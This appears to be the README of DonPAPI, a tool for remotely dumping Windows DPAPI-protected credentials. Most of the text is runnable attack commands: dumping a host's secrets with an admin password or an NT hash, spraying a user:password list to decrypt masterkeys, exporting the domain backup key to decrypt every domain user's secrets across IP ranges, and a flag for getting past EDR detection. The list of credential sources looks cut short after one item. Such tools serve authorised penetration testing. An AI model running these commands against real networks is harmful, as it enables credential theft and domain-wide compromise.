DonPAPI dumps DPAPI credentials remotely.
DPAPI Dumping
Lots of credentials are protected by DPAPI.
We aim to locate those "secured" credentials and retrieve them using:
- TaskScheduled (credential blob)

With a local admin account on a host, we can dump the machine's DPAPI secrets. With a user password, or the domain PVK, we can unprotect the user's DPAPI secrets.

Dump all secrets of the target machine with an admin account:
DonPAPI.py domain/user:passw0rd@target
Using the user's hash (placeholder LM:NT hash pair):
DonPAPI.py --hashes <LM>:<NT> domain/user@target
Using Kerberos (-k) or local authentication (-local_auth):
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
Using a user with LAPS password reading rights:
DonPAPI.py -laps domain/user:passw0rd@target
It is also possible to provide the tool with a list of credentials that will be tested on the target. DonPAPI will try each of them to decrypt the masterkeys.
This credential file must have the following syntax (one user:password pair per line):
user1:pass1
user2:pass2
…
DonPAPI.py -credz credz_file.txt domain/user:passw0rd@target
When a domain admin user is available, it is possible to dump the domain backup key using the impacket dpapi.py tool:
dpapi.py backupkey --export
This backup key can then be used to dump the secrets of every domain user:
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
The target can be an IP, an IP range, a CIDR, or a file containing a list of targets (one per line).
The RemoteOps part can be spotted by some EDR products. It can be disabled with the --no_remoteops flag, but then the machine DPAPI key won't be retrieved, and scheduled task credentials and Wi-Fi passwords won't be harvested.
Installation
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py